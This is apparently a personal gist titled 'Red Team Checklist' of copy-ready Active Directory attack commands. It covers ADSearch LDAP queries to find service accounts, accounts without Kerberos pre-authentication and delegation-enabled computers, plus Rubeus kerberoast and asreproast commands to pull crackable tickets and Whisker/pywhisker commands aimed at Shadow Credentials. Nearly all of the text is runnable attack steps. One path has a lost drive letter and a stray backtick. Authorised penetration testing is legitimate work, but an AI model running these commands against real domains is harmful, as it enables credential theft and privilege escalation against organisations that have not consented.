gistfile1.txt

# Red Team Checklist

## Kerberoasting

Find SPNS (can also be found from ADExplorer snapshot)
`C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=user)(servicePrincipalName=*))" --attributes cn,servicePrincipalName,samAccountName`

Roast individually
`C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe kerberoast /user:sqlsvc /nowrap`

## ASREP Roasting

Find accounts without pre-auth enabled (can also be found from ADExplorer snapshot)
`:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))" --attributes cn,distinguishedname,samaccountname`

Roast individually
`C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asreproast /user:sqlsvc /nowrap``

## Unconstrained Delegation

Find all computers permitted for unconstrained delegation (can also be found from ADExplorer snapshot)
`C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname`

## Constrained Delegation

Find all computers permitted for constrained delegation (can also be found from ADExplorer snapshot)
`C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=computer)(msds-allowedtodelegateto=*))" --attributes dnshostname,samaccountname,msds-allowedtodelegateto --json`

## Resource-based Constrained Delegation

Check MachineAccountQuota for quick win

## Shadow Credentials

If `msDS-KeyCredentialLink` is writable for this object, can obtain a TGT

`pywhisker.py -d "$DOMAIN" -u "$USER" -p "$PASSWORD" --target "$TARGET" --action "list"`
`C:\Tools\Whisker\Whisker\bin\Release\Whisker.exe list /target:dc$`